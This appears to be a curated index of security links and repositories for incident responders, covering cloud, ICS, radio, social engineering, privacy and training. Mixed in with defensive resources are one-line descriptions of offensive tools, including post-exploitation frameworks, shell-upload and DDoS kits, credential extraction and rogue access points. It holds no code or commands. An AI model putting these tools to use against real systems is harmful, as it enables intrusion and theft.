gVisor 15,851 6 days ago : is an application kernel, written in Go, that implements a substantial portion of the Linux system surface
PARSEC 471 3 months ago : Platform AbstRaction for SECurity service
Cloud Security Alliance : The Cloud Security Alliance (CSA) is the world’s leading organization dedicated to defining and raising awareness of best practices to help ensure a secure cloud computing environment
CIS Controls Cloud Companion Guide
CloudFail 2,237 8 months ago : Utilize misconfigured DNS and old database records to find hidden IPs behind the CloudFlare network
HatCloud 514 over 1 year ago (discontinued)
Uncovering bad guys hiding behind CloudFlare
CloudFlair 2,618 5 months ago : Find origin servers of websites behind CloudFlare by using Internet-wide scan data from Censys
thsosrtl 52 over 10 years ago : Repo for tools - cloud and VPN. It was originally intended for attempting to resolve the true IP address of hosts served through Cloudflare
Malicious Shell Script Steals Cloud Credentials
badPods 599 over 2 years ago : A collection of manifests that will create pods with elevated privileges
carbon-black-cloud-sdk-python 40 7 days ago : VMware Carbon Black Cloud Python SDK
Baserunner 205 about 2 years ago : A tool for exploring Firebase datastores
A SOC Tried To Detect Threats in the Cloud … You Won’t Believe What Happened Next
The Cloud Native Computing Foundation (CNCF) hosts critical components of the global technology infrastructure
Checkov 7,126 7 days ago is a static code analysis tool for infrastructure-as-code
KICS 2,093 8 days ago : stands for Keeping Infrastructure as Code Secure. It is open source and a must-have for any cloud native project. It finds security vulnerabilities, compliance issues, and infrastructure misconfigurations in the following Infrastructure as Code solutions: Terraform, Kubernetes, Docker, AWS CloudFormation, Ansible. 1900+ queries are available
10 real-world stories of how we’ve compromised CI/CD pipelines
GitHub Action Runners, Analyzing the Environment and Security in Action

CSIRT / Mobile / GCP/Google

gcp dhcp takeover code exec 533 over 3 years ago : Google Compute Engine (GCE) VM takeover via DHCP flood - gain root access by getting SSH keys added by google_guest_agent
New research: How effective is basic account hygiene at preventing hijacking

CSIRT / Mobile / Azure

SimuLand 703 over 1 year ago : Understand adversary tradecraft and improve detection strategies
Azure-Readiness-Checklist 495 almost 2 years ago : This checklist is your guide to the best practices for deploying secure, scalable, and highly available infrastructure in Azure. Before you go live, go through each item, and make sure you haven't missed anything important!
Preventing Exposed Azure Blob Storage
Open Azure blobs search on grayhatwarfare.com and other updates
ChaosDB : is an unprecedented critical vulnerability in the Azure cloud platform that allows for remote account takeover of Azure’s flagship database - Cosmos DB
Introducing Project Freta : Toward trusted sensing for the cloud
Finding Azurescape : Cross-Account Container Takeover in Azure Container Instances
Malicious KQL Query Azure Monitor:

CSIRT / Mobile / AWS

git-secrets 12,442 7 months ago : Prevents you from committing secrets and credentials into git repositories
CloudMapper 6,003 4 months ago : CloudMapper helps you analyze your Amazon Web Services (AWS) environments
Security Monkey 4,357 almost 4 years ago : Security Monkey monitors AWS, GCP, OpenStack, and GitHub orgs for assets and their changes over time
my-arsenal-of-aws-security-tools 8,975 25 days ago : List of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc
RKMS 43 almost 6 years ago : RKMS is a highly available key management service, built on top of AWS's KMS
FireProx 1,925 over 1 year ago : AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation
AWS IAM privileges as found using the AWS Policy Generator described at
Sadcloud 658 about 1 year ago : A tool for standing up (and tearing down!) purposefully insecure cloud infrastructure
Endgame : Creating
Bucky 190 almost 3 years ago : An automatic S3 bucket discovery tool
Prowler 10,839 7 days ago : Prowler is a security tool to perform AWS security best practices assessments, audits, incident response, continuous monitoring, hardening and forensics readiness
barq 386 about 2 years ago : The AWS Cloud Post Exploitation framework!
Text → AWS IAM Policy : Describe your ideal AWS IAM Policy in plain text and it will use GPT-3 from OpenAI to generate an AWS IAM policy

CSIRT / Risk Assessment and Vulnerability Management

Cyber Risk Management (PT-BR)
RITA (Real Intelligence Threat Analytics) 2,509 4 months ago
Blended threats are the future, because no matter how good your cloud security is, at some point a grumpy SRE who feels jilted over some work BS is gonna enjoy pulling one over on those C suite assholes, for $20k cash by grugq
ISO27001 audit in real-time....
Gearing Towards Your Next Audit : Understanding the Difference Between Best Practice Frameworks and Regulatory Compliance Standards
Nuclei 20,687 7 days ago : is a fast tool for configurable targeted scanning based on templates, offering massive extensibility and ease of use. Nuclei templates : Community-curated list of templates for the nuclei engine to find security vulnerabilities in applications

CSIRT / Risk Assessment and Vulnerability Management / Nuclei

Nuclei unleashed - writing first exploit

CSIRT / Risk Assessment and Vulnerability Management

Secure design principles
Risk Assessment of GitHub Copilot
ISA/IEC 62443
Understanding IEC 62443
NERC CIP
Threat Modeling Manifesto
hcltm 401 3 months ago : Documenting your Threat Models with HCL
Risk Management Framework for Systems and Organizations Introductory Course

CSIRT / Risk Assessment and Vulnerability Management / Guidelines

NIST Special Publication 800-63B: Digital Identity Guidelines
Easy Ways to Build a Better P@$5w0rd
Time for Password Expiration to Die
Data Integrity: Identifying and Protecting Assets Against Ransomware and Other Destructive Events

CSIRT / ICS (SCADA)

GRASSMARLIN 941 over 4 years ago : Provides situational awareness of Industrial Control Systems (ICS) and Supervisory Control and Data Acquisition (SCADA) networks in support of network security assessments
ATT&CK® for Industrial Control Systems
THE RACE TO NATIVE CODE EXECUTION IN PLCS
The Top 20 Secure PLC Coding Practices Project

CSIRT / ICS (SCADA) / Synchrophasor

IEEE C37.118.1-2011 - IEEE Standard for Synchrophasor Measurements for Power Systems
Measuring relays and protection equipment - Part 118-1: Synchrophasor for power systems - Measurements
IEEE C37.118 protocol
IEEE C37.118 Synchrophasor Protocol wireshark wiki

CSIRT / ICS (SCADA)

INFRA:HALT : Forescout Research Labs and JFrog Security Research discover 14 new vulnerabilities affecting closed source TCP/IP stack NicheStack, allowing for Denial of Service or Remote Code Execution primarily affecting operational technology (OT) and industrial control system (ICS) devices
Findings From Examining More Than a Decade of Public ICS/OT Exploits
Conpot 1,243 9 months ago : ICS/SCADA honeypot
Hello_Proto 9 over 3 years ago : "Banner grabbing" in industrial environments

CSIRT / Radio

Qualcomm chain-of-trust
Presenting QCSuper : a tool for capturing your 2G/3G/4G air traffic on Qualcomm-based phones
Logitech keyboards and mice vulnerable to extensive cyber attacks
A look at GSM
The gr-gsm project 1,346 11 months ago : Gnuradio blocks and tools for receiving GSM transmissions
srsLTE 3,484 5 months ago : Open source SDR LTE software suite from Software Radio Systems (SRS)
List of software-defined radios
Spectrum Analyzers, Linux

CSIRT / Radio / Spectrum Analyzers, Linux

Sonic Visualiser :
spek
SpectMorph : is a free software project which allows analysing samples of musical instruments and combining them (morphing)

CSIRT / Radio

The LibreCellular project aims to make it easier to create 4G cellular networks with open source software and low cost software-defined radio (SDR) hardware
RFSec-ToolKit 1,565 6 months ago is a collection of Radio Frequency Communication Protocol Hacktools

CSIRT / Radio / Satellite

How Do I Crack Satellite and Cable Pay TV? (33c3)

CSIRT / Radio / Satellite / How Do I Crack Satellite and Cable Pay TV? (33c3)

Capture data from QPSK-demodulated OOB bitstream with Saleae logic analyzer and output byte stream. 19 over 8 years ago
Process QPSK-demodulated data into transport stream (SCTE 55-1) 21 over 8 years ago

CSIRT / Social Engineering

Cartero 171 over 4 years ago : Social Engineering Framework
The Basics of Social Engineering by Chris Pritchard at DEF CON 27. Books suggested:

CSIRT / Social Engineering / The Basics of Social Engineering

Never Split the Difference, Chris Voss
The Charisma Myth, Olivia Fox Cabane
Hacking the Human Ian Mann
Chris Hadnagy The Art Of Social Engineering -
Joe Navarro What Everybody is Saying -

CSIRT / Social Engineering

The Social-Engineer Toolkit (SET) 11,000 about 1 month ago : repository from TrustedSec - All new versions of SET will be deployed here

CSIRT / Tools

Network Security Monitoring on Raspberry Pi type devices 779 almost 7 years ago
A secure, shared workspace for secrets 614 almost 6 years ago
bettercap 16,771 6 days ago , the Swiss army knife for network attacks and monitoring
Quijote 47 almost 4 years ago is a highly configurable HTTP middleware for API security
Tool Analysis Result Sheet 345 almost 7 years ago by jpcertcc
EKOLABS 51 about 2 years ago tools repo
Vapor PwnedPasswords Provider : Package for testing a password against Pwned Passwords V2 API in Vapor
Is my password pwned? 151 almost 4 years ago ,
XPoCe : XPC Snooping utilities for macOS and iOS (version 2.0)
Enterprise Password Quality Checking 158 almost 2 years ago using any hash data sources (HaveIBeenPwned lists, et al)
DockerAttack 278 over 6 years ago : Various Tools and Docker Images
PyREBox 1,654 9 months ago is a Python scriptable Reverse Engineering sandbox
find3 4,653 almost 2 years ago : High-precision indoor positioning framework, version 3
structured-text-tools 6,982 3 months ago : A list of command line tools for manipulating structured text data
telnetlogger 238 over 7 years ago : Simulates enough of a Telnet connection in order to log failed login attempts
vault 31,217 6 days ago : A tool for secrets management, encryption as a service, and privileged access management
WeakNet LINUX 8 : This is an information-security themed distribution that has been in development since 2010
HiTB : It was a part of HackTheBox platform
arphid 34 over 6 years ago : DIY 125 kHz RFID read/write/emulate guide
Pybelt 511 over 6 years ago : The hackers tool belt
mhax 30 over 6 years ago
U2F Support Firefox Extension 197 about 7 years ago
git-bug 8,148 11 days ago : Distributed bug tracker embedded in Git
mkcert 50,197 3 months ago : A simple zero-config tool to make locally trusted development certificates with any names you'd like
trackerjacker 2,636 10 months ago : Like nmap for mapping wifi networks you're not connected to, plus device tracking
Polymorph 461 10 months ago is a real-time network packet manipulation framework with support for almost all existing protocols
query_huawei_wifi_router 13 over 3 years ago : A CLI tool that queries a Huawei LTE WiFi router (MiFi) to get statistics such as signal strength, battery status, remaining data balance etc
kravatte 15 almost 6 years ago : Implementation of Kravatte Encryption Suite
noisy 1,692 12 months ago : Simple random DNS, HTTP/S internet traffic noise generator
PatternAnalyzer 12 over 4 years ago : The purpose of this application is to analyze and create statistics of repetitive lock patterns that everyday users create and use
Google Chromium 20,774 7 days ago , sans integration with Google
Gammux 54 over 5 years ago : A Gamma muxing tool. This tool merges two pictures together by splitting them into high and low brightness images
openvotenetwork : Implementation of anonymous in go
put2win 125 over 4 years ago : Script to automatize shell upload by PUT HTTP method to get meterpreter
Tools by Morphus Labs
Stratosphere IPS
Convert nmap Scans into Beautiful HTML Pages
NMapGUI 468 over 4 years ago : Advanced Graphical User Interface for NMap
GeoInt
python-nubia 1,591 over 2 years ago : A command-line and interactive shell framework
nipe 1,954 3 months ago : is a script to make the Tor network your default gateway
fuxploider 3,050 over 1 year ago : File upload vulnerability scanner and exploitation tool
solo 2,310 about 2 years ago : FIDO2 USB+NFC token optimized for security, extensibility, and style
Joint Report On Publicly Available Hacking Tools : by Canadian Centre for Cyber Security
APTSimulator 2,470 over 1 year ago : A toolset to make a system look as if it was the victim of an APT attack
debugger-netwalker 7 about 7 years ago : NetWalker Debugger
USB armory 1,372 24 days ago :
Bashfuscator 1,660 about 1 year ago : A fully configurable and extendable Bash obfuscation framework. This tool is intended to help both red team and blue team
Big List of Naughty Strings 46,201 7 months ago
Netflix Cloud Security SIRT releases Diffy : A Differencing Engine for Digital Forensics in the Cloud -
Command-Line Snippets : A place to share useful, one-line commands that make your life easier
IP-to-ASN - Team Cymru
4nonimizer 620 almost 3 years ago : A bash script for anonymizing the public IP used to browse the Internet, managing the connection to the Tor network and to different VPN providers (OpenVPN)
free Entropy Service
Correct Horse Battery Staple : Secure password generator to help keep you safer online
CorrectHorse 2 about 8 years ago : random secure password generator
XKCD-password-generator 1,325 5 months ago : Generate secure multiword passwords/passphrases, inspired by XKCD
Using a Hardened Container Image for Secure Applications in the Cloud
freedomfighting 403 over 1 year ago : A collection of scripts which may come in handy during your freedom fighting activities
Machine Learning and Security 1,979 about 2 years ago : Source code about machine learning and security
octofairy 14 almost 6 years ago : A machine learning based GitHub bot for Issues
kbd-audio 8,545 almost 2 years ago : Tools for capturing and analysing keyboard input paired with microphone capture
certstreamcatcher 81 almost 6 years ago : This tool is based on regex with effective standards for detecting phishing sites in real time using certstream and can also detect punycode (IDNA) attacks
Wifiphisher 13,314 11 months ago : is a rogue Access Point framework for conducting red team engagements or Wi-Fi security testing
chezmoi 13,411 4 days ago : Manage your dotfiles securely across multiple machines
hexyl 9,166 23 days ago : A command-line hex viewer
Giggity 126 over 1 year ago : Wraps github api for openly available information about an organization, user, or repo
howmanypeoplearearound 6,919 3 months ago : Count the number of people around you by monitoring wifi signals
LASCAR 376 about 1 year ago : Ledger's Advanced Side-Channel Analysis Repository
Hostintel : A Modular Python Application To Collect Intelligence For Malicious Hosts -
DarkNet_ChineseTrading 1,067 over 1 year ago
mXtract 582 about 3 years ago : Memory Extractor & Analyzer
commando-vm 6,960 about 2 months ago : a fully customized, Windows-based security distribution for penetration testing and red teaming

CSIRT / Tools / commando-vm

commando packages 6,960 about 2 months ago

CSIRT / Tools

Introducing Inkdrop 4
AntiCheat-Testing-Framework 791 over 2 years ago : Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. All this code is the result of a research done for Recon2019 (Montreal)
IronPython, darkly: how we uncovered an attack on government entities in Europe
inlets : Expose your local endpoints to the Internet
papers 5 2 months ago Papers released by the Intelstorm Team
Pwnagotchi 7,750 3 months ago : (⌐■_■) - Deep Reinforcement Learning vs WiFi
spyse.py 269 over 4 years ago : Python API wrapper and command-line client for the tools hosted on spyse.com
Cloning a MAC address to bypass a captive portal
Open Steno Project was founded by stenographer Mirabai Knight as a reaction to the closed down, proprietary nature of the court reporting industry
Machine Learning on Encrypted Data Without Decrypting It
0bin 1,378 over 3 years ago : Client side encrypted pastebin
Raspberry pi as poor man’s hardware hacking tool
usbkill 4,442 9 months ago : is an anti-forensic kill-switch that waits for a change on your USB ports and then immediately shuts down your computer
gs-transfer 24 over 3 years ago : Secure File Transfer via Global Socket Bounce Network
CORE 683 about 2 months ago : The Common Open Research Emulator (CORE) is a tool for emulating networks on one or more machines
VoightKampff : Beating Google ReCaptcha and the funCaptcha using AWS Rekognition
John the Ripper in the cloud : John the Ripper jumbo supports hundreds of hash and cipher types
SpamCop is the premier service for reporting spam
vector-edk 132 over 9 years ago : EFI Development Kit
H1R0GH057 1,838 over 1 year ago : tools (DDoS, lulz, etc.)
gatekeeper 1,341 about 2 months ago : First open-source DDoS protection system
uriDeep 95 almost 3 years ago : Unicode encoding attacks with machine learning
Rawsec's CyberSecurity Inventory :
gaijin tools
Lord Of The Strings (LOTS) 9 over 4 years ago : String extraction and classification tool for binary files, designed to extract only the strings that can be considered relevant (i.e. not garbage or false positives)
Unit 42 Public Tools Repo 709 about 2 years ago : Listing of tools released by Palo Alto Networks Threat Intelligence team
glsnip 109 almost 3 years ago : copy and paste across machines
CERTrating is the first tool to assess the Maturity Level of CERTs and their services. News:
Cybersecurity Maturity Model Certification (CMMC)
What is the Cybersecurity Maturity Model Certification (CMMC)
Who needs to have Cybersecurity Maturity Model Certification (CMMC)
Security Tools : Most of the links listed here go to the original sites
Find Virtual Hosts for Any IP Address
ngrok 24,183 7 months ago : Introspected tunnels to localhost
cppngrok 8 over 3 years ago : a cpp wrapper for ngrok (WIP)
Pybull 31 over 2 years ago : Contains some cool Python projects. It is 100% Python coded. Have fun
dfss 5 about 8 years ago : Daemon for sense of security. Shutdown or reboot your computer, like a " "
Gamifying machine learning for stronger security and AI models : An experimentation and research platform to investigate the interaction of automated agents in abstract simulated network environments
BashScan : is a port scanner built to utilize /dev/tcp for network and service discovery on systems that have limitations or are otherwise unable to use alternative scanning solutions such as nmap
python-libnessus 25 almost 2 years ago : Python Nessus Library - libnessus is a python library to enable devs to chat with nessus XMLRPC API, parse, store and diff scan results. It's wonderful
NFIQ2 132 about 2 months ago : Biometric fingerprint image quality assessment tool
Beta 245 about 1 year ago : Beta versions of Didier Stevens's software
MaxMind ASN Importer 3 over 1 year ago : This is a script to import MaxMind ASN data into Tags (Host Groups) within Stealthwatch Enterprise, allowing for more granular tuning and identification of network flows
SubSeven is Back : The legendary SubSeven returns with a fan-made version that delivers a retro remote control experience with no loss of functionality and no external dependencies required
Detect It Easy 7,631 5 days ago : Program for determining types of files for Windows, Linux and MacOS
Ronin is a free and Open Source Ruby toolkit for security research and development. Ronin contains many different CLI commands and Ruby libraries for a variety of security tasks, such as encoding/decoding data, filtering IPs/hosts/URLs, querying ASNs, querying DNS, HTTP, scanning for web vulnerabilities, spidering websites, installing 3rd-party repositories of exploits and/or payloads, running exploits, writing new exploits, managing local databases, fuzzing data, and much more

CSIRT / Tools / Note-taking

Awesome note-taking apps for hackers! 347 almost 4 years ago
SwiftnessX 889 almost 2 years ago : A cross-platform note-taking & target-tracking app for penetration testers
cherrytree : A hierarchical note taking application, featuring rich text and syntax highlighting, storing data in a single xml or sqlite file
trilium (https://github.com/zadam/trilium) 27,370 4 months ago : Build your personal knowledge base with Trilium Notes
obsidian : is a powerful knowledge base that works on top of a local folder of plain text Markdown files
CudaText ,
marktext 47,398 3 months ago : A simple and elegant markdown editor, available for Linux, macOS and Windows
helix 33,775 9 days ago : A post-modern modal text editor
Compare AsciiDoc and Markdown

CSIRT / Tools / Kali

hurl 72 about 7 years ago : hexadecimal & URL encoder + decoder. hURL is a small utility that can encode and decode between multiple formats
Kali Tools

CSIRT / Tools / IP Reputation

IP Reputation Check
IP & Domain Reputation Center

CSIRT / Tools / Shell tools

Python-Scripts 172 9 days ago : some scripts for penetration testing
SubEnum 329 about 1 year ago : bash script for Subdomain Enumeration
password-store : Simple password manager using gpg and ordinary unix directories

CSIRT / Tools / Search Engines

DarkSearch :
Search engines for Hackers :

CSIRT / Tools / Search Engines / Search engines for Hackers

censys.io
shodan.io

CSIRT / Tools / Search Engines / Search engines for Hackers / shodan.io

TriOp : Tool for quickly gathering statistical information from Shodan.io

CSIRT / Tools / Search Engines / Search engines for Hackers

viz.greynoise.io
zoomeye.org
wigle.net
publicwww.com
hunter.io
haveibeenpwned.com
haveibeenEMOTET
thispersondoesnotexist.com
osintframework.com
NAPALM FTP Indexer lets you search and download files located on public FTP servers. The most advanced FTP Search Engine service maintained by members

CSIRT / Tools / Search Engines

Insecam : Network live IP video cameras directory

CSIRT / Tools / VPN

Jigsaw project by Alphabet/Google : VPN Server
SSHuttle 11,787 22 days ago : Transparent proxy server that works as a poor man's VPN. Forwards over ssh. Doesn't require admin. Works with Linux and MacOS. Supports DNS tunneling
WireGuard : is an extremely simple yet fast and modern VPN that utilizes state-of-the-art cryptography. It aims to be faster, simpler, leaner, and more useful than IPSec, while avoiding the massive headache
Crockford’s base 32 encoding : Crockford’s base 32 encoding is a compromise between efficiency and human legibility
Sputnik - An Open Source Intelligence Browser Extension
PCredz 2,013 about 1 month ago : This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface
uncaptcha2 4,959 almost 6 years ago : defeating the latest version of ReCaptcha with 91% accuracy
Nefarious LinkedIn 824 almost 6 years ago : A look at how LinkedIn spies on its users
ProtonVPN-CLI : Linux command-line client for ProtonVPN. Written in Python
Nebula 14,583 7 days ago : A scalable overlay networking tool with a focus on performance, simplicity and security
AirVPN : A VPN based on OpenVPN and operated by activists and hacktivists in defence of net neutrality, privacy and against censorship
Build your own private WireGuard VPN with PiVPN

CSIRT / Tools / Secure Sharing

CryFS : Keep your data safe in the cloud
Cryptomator : Multi-platform transparent client-side encryption of your files in the cloud
VeraCrypt : is a free open source disk encryption software for Windows, Mac OSX and Linux
CipherShed : is a program that can be used to create encrypted files or encrypt entire drives (including USB flash drives and external HDDs)
Boxcryptor : Security for your Cloud
Nextcloud E2E 31 15 days ago : End-to-end encryption RFC. Some old news
DiskCryptor is an open encryption solution that offers encryption of all disk partitions, including the system partition
ProjectSend 1,411 about 2 months ago is a free, open source software that lets you share files with your clients, focused on ease of use and privacy. It supports clients groups, system users roles, statistics, multiple languages, detailed logs... and much more!
send 13,263 over 3 years ago (Mozilla) : Simple, private file sharing from the makers of Firefox (archived). Revival:

CSIRT / Privacy

Apple : Device and Data Access when Personal Safety is At Risk
Everything Old is New Part 2: Why Online Anonymity Matters
Data Security on Mobile Devices : Current State of the Art, Open Problems, and Proposed Solutions
Breach alert: on Apr 7th -based fintech IUGU exposed its entire database, incl. ALL customers and account details: emails, phones, addresses, invoices etc. IP with 1.7TB indexed by Shodan, I immediately alerted the company, db was taken down within an hour. No response.
TorBox Wireless Manager
Anyone can use this powerful facial-recognition tool — and that's a problem
The Instagram ads Facebook won't show you
Yggdrasil 3,649 4 days ago : An experiment in scalable routing as an encrypted IPv6 overlay network
Receiving sensitive information about any Dodo pizzeria 24 over 3 years ago
4TB of stolen identities are being circulated online following a breach on Oriflame
Using “Master Faces” to Bypass Face-Recognition Authenticating Systems
apollo 1,372 about 1 year ago : A Unix-style personal search engine and web crawler for your digital footprint
Forensic Methodology Report: How to catch NSO Group’s Pegasus
Who is being monitored? : Politicians regularly claim that they need to ban encryption to protect the children. But who is actually being monitored?
How to choose a browser for everyday use? , and
TrackerControl 31 over 1 year ago : monitor and control trackers and ads
Disinformation guru “Hacker X” names his employer: NaturalNews.com
Hey Siri, Find My Ex : Tech-Enabled Abuse in the Apple Ecosystem
Keyhole Imaging
Your Roomba May Be Mapping Your Home, Collecting Data That Could Be Shared
Global Presence of Authoritarian Tech
Zooming in on Zero-click Exploits

CSIRT / General

Explain Shell
Examples of regular expressions
A tcpdump Tutorial and Primer with Examples
Capture WiFi / WLAN / 802.11 Probe Request with tcpdump
A curated list of awesome Threat Intelligence resources 8,127 3 months ago
Looking for value in EV Certificates
How to find hidden cameras
The Simple Encrypted Arithmetic Library (SEAL) 225 over 5 years ago : This repository is a fork of Microsoft Research's homomorphic encryption implementation
Cupcake 408 about 1 year ago : A Rust library for lattice-based additive homomorphic encryption
Our latest updates on Fully Homomorphic Encryption
A port of ChibiOS to the Orchard radio platform 11 about 9 years ago
Decent Security : Everyone can be secure
Introducing Certificate Transparency and Nimbus
trillian 3,553 6 days ago : Trillian implements a Merkle tree whose contents are served from a data storage layer, to allow scalability to extremely large trees
CFSSL's CA trust store repository 258 18 days ago
A Few Thoughts on Cryptographic Engineering
Mailfence
Threat Hunting Workshop - Methodologies for Threat Analysis
Xoodoo 32 almost 3 years ago
CoPilot is a wireless hotspot for digital security trainers that provides an easy to use web interface for simulating custom censorship environments during trainings
AgentMaps 918 2 months ago : Make social simulations on interactive maps with Javascript!
flowsscripts 1 over 6 years ago : Miner pools ips
SwiftFilter 403 over 4 years ago : Exchange Transport rules to detect and enable response to phishing
The Illustrated TLS Connection : Every Byte Explained
Practical Cryptography
Thieves and Geeks: Russian and Chinese Hacking Communities
ephemera-miscellany 396 over 6 years ago : Ephemera and other documentation associated with the 1337list project
CleverHans 6,202 8 months ago : An adversarial example library for constructing attacks, building defenses, and benchmarking both
HTTP/3 Explained
security 64 almost 7 years ago : Discussion area for security aspects of ECMAScript
Template for Data Protection Impact Assessment (DPIA)
hash collisions 1,475 almost 2 years ago : exploitation and other related material
Shodan - A tool for Security and Market Research
Engineering Security : general book about a range of topics in security
Information security posters of the Russian Army (ru) : Russian counter-information posters
Kerberos (I) : How does Kerberos work? – Theory
Vulncode-DB project 575 almost 3 years ago : The vulnerable code database (Vulncode-DB) is a database for vulnerabilities and their corresponding source code if available
One-End Encryption (OEE) 196 almost 2 years ago : Stronger than End-to-End Encryption
Automatic SSL with Now and Let's Encrypt
Hacking Digital Calipers
Binary Hardening in IoT products : Last year, the team at CITL looked into the state of binary hardening features in IoT firmware
ZigDiggity 261 about 3 years ago : A ZigBee hacking toolkit by Bishop Fox
Bolstering Security with Cyber Intelligence
Resources-for-Beginner-Bug-Bounty-Hunters 10,763 4 months ago : A list of resources for those interested in getting started in bug bounties
THE DEFINITIVE GUIDE TO ENCRYPTION KEY MANAGEMENT FUNDAMENTALS
Explanatory Report to the Additional Protocol to the Convention on Cybercrime
PAN-OS GlobalProtect Portal Scanner 123 5 months ago : Determine the Palo Alto PAN-OS software version of a remote GlobalProtect portal or management interface
Thomas Roccia's #100DaysOfCode challenge : IDA Pro and a lot of other things
Audi A7 2014 MMI Mishandles the Format-string Specifiers
BoF + Sockets + Encoding Errors with Python3 (pt-br)
Yet another SIP003 plugin for shadowsocks, based on v2ray 2,699 19 days ago : A SIP003 plugin based on v2ray
Information Security related Mind Maps
List of Rainbow Tables
Do you hear what I hear? A cyberattack. : CyLab’s Yang Cai is turning network traffic data into music
Ghost in the ethernet optic : A few months ago I stumbled on a tweet pointing out a kind of SFP optic that claimed to be smart, made by a Russian company Plumspace

CSIRT / General / Configs

Kali-Customizations 4 about 5 years ago

CSIRT / Resources

13 Best New Software Security Books To Read In 2021
pwn.college is a first-stage education platform for students (and other interested parties) to learn about, and practice, core cybersecurity concepts in a hands-on fashion. It is designed to take a “white belt” in cybersecurity to become a “blue belt”, able to approach (simple) CTFs and wargames. The philosophy of pwn.college is “practice makes perfect”
'pwnable.kr' is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. The main purpose of pwnable.kr is 'fun'
Pwnable.tw is a wargame site for hackers to test and expand their binary exploiting skills
Security Zines : graphical way of learning concepts of Application & Web Security

CSIRT / Resources / Training and Certifications

OSWE 567 over 2 years ago : OSWE Preparation
AWAE/OSWE : Preparation for coming AWAE Training
AWAE-PREP 859 over 3 years ago : This repository will serve as the "master" repo containing all trainings and tutorials done in preparation for OSWE in conjunction with the AWAE course. This repo will likely contain custom code by me and various courses
offsec_WE 38 about 5 years ago : learning case to prepare OSWE
AWAE-Preparation 236 about 5 years ago : This repository will contain all trainings and tutorials I have done/read to prepare for OSWE / AWAE
From AWAE to OSWE: The Preparation Guide
Awesome Infosec 5,207 9 months ago : A curated list of awesome infosec courses and training resources
Security Certification Progress Chart
study material used for the 2018 CISSP exam 555 almost 4 years ago
JustTryHarder 796 almost 2 years ago : a cheat sheet which will aid you through the PWK course & the OSCP Exam. (Inspired by PayloadAllTheThings)
Hacking Your Pen Testing / Red Teaming Career: Part 1
PentesterAcademy : Courses and Online Labs
OSCE-exam-practice 56 over 4 years ago
RED TEAM Operator: Malware Development Essentials Course
OSCP Journey
Hacking Dojo
Learning from your mistakes as an offensive security professional
Burp Suite Academy
The Ultimate List of SANS Cheat Sheets
Posters: Pen Testing
#OSCP exam advice thread.
Targeted Malware Reverse Engineering Workshop
OpenSecurity : We do quality pentests, security engineering, security training and we ♥ OpenSource
OPSEC: In Theory and Practice : Learn OPSEC through historical examples. This introductory course covers OPSEC concepts, theory, and application. You will learn how to critically assess security advice, and how to differentiate between good and bad OPSEC
opsec 96 over 3 years ago : Counter Surveillance and OPSEC research
Guide-CEH-Practical-Master 1,209 about 1 year ago
Understand Kerberos Delegation, Active Directory Security Descriptors, Windows Lateral Movements, etc.
Free Incident Response Training Plan : Notes from my "Implementing a Kick-Butt Training Program: Blue Team GO!" talk
CyberDefenders is a training platform focused on the defensive side of cybersecurity, aiming to provide a place for blue teams to practice, validate the skills they have, and acquire the ones they need
OSCP: My path to the promised land. (pt-br)
psylinux 18 about 3 years ago
How I Passed OSCP with 100 points in 12 hours without Metasploit in my first attempt
SOC Core Skills w/ John Strand
awesome-cyber-skills 3,672 5 months ago : A curated list of hacking environments where you can train your cyber skills legally and safely

CSIRT / Resources / Conferences and Slides

H2HC Hackers To Hackers Conference:

CSIRT / Resources / Conferences and Slides / H2HC

H2HC 2017 48 almost 7 years ago : H2HC 2017 Slides/Materials/Presentations
H2HC 2018 36 almost 4 years ago : Slides/Materials/Presentations
JavaDeserH2HC 491 over 2 years ago : Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC)
H2HC 2021

CSIRT / Resources / Conferences and Slides / CCC

Modchips of the State : Hardware implants in the supply-chain - CCC 2018

CSIRT / Resources / Conferences and Slides / BlackHat

Cybersecurity as Realpolitik (2014 Keynote) : amazing keynote by Dan Geer (Geertinho)
Kudelski Security's 2018 pre-Black Hat crypto challenge 36 about 6 years ago
Expert demonstrated a new PHP code execution attack (2018)

CSIRT / Resources / Conferences and Slides / BlackHat / 2021

supply chain issues talk
MFA-ing the Un-MFA-ble: Protecting Auth Systems' Core Secrets

CSIRT / Resources / Conferences and Slides / DEFCON

Doublethink (2018) : 8-Architecture Assembly Polyglot by Robert Xiao
SAFEMODE (2020)

CSIRT / Resources / Conferences and Slides / DEFCON / 2021

OpenSOC Blue Team CTF @ DEFCON 29 FAQ
Using Barq to perform AWS Post-Exploitation Actions

CSIRT / Resources / Conferences and Slides

SBSeg 2018 : Simpósio Brasileiro em Segurança da Informação e de Sistemas Computacionais (SBSeg)

CSIRT / Resources / Conferences and Slides / Objective by the Sea (2018)

APFS Internals by Jonathan Levin
Protecting the Garden of Eden by Patrick Wardle
Code signing flaw in macOS by Thomas Reed
From Apple Seeds to Apple Pie by Sarah Edwards
When Macs Come Under ATT&CK by Richie Cyrus
Crashing to Root by Brandon Azad
Leveraging Apple's Game Engine for Advanced Threat Detection by Josh Stein / Jon Malm
MacDoored by Jaron Bradley
Who Moved my Pixels? by Mikhail Sosonkin
Aliens Among Us by Michael Lynn

CSIRT / Resources / Conferences and Slides

An Introduction To Binary Exploitation 341 almost 6 years ago (BlackHoodie 2018 Workshop)
r2con2020

CSIRT / Resources / Conferences and Slides / r2con2020

workshop: semi-automatic code deobfuscation 76 about 3 years ago
r2con2020 DAY3 Live Stream

CSIRT / Resources / Conferences and Slides

hack.lu
MISP Summit 05 : MISP Threat Intelligence Summit 0x05 at hack.lu 2019. Practical threat intelligence and information sharing for everyone
Hack.lu 2019 Day #1 Wrap-Up
The Open Source Security Software
Hack.lu 2021 Stonks Socket
How to R&D hacking toys for fun & no-profit
Security Guidelines for Congressional Campaigns
From Assembly to JavaScript and back 20 over 6 years ago (OffensiveCon2018)
ARM-based IoT Exploit Development
An Introduction to Threat Intelligence and Threat Hunting for Companies Without an Infinite Budget (pt-br)
Presentations 181 7 days ago Outflank
The Art of De-obfuscation
Smartphone Privacy : How Your Smartphone Tracks Your Entire Life
Fun with LDAP and Kerberos in AD environments
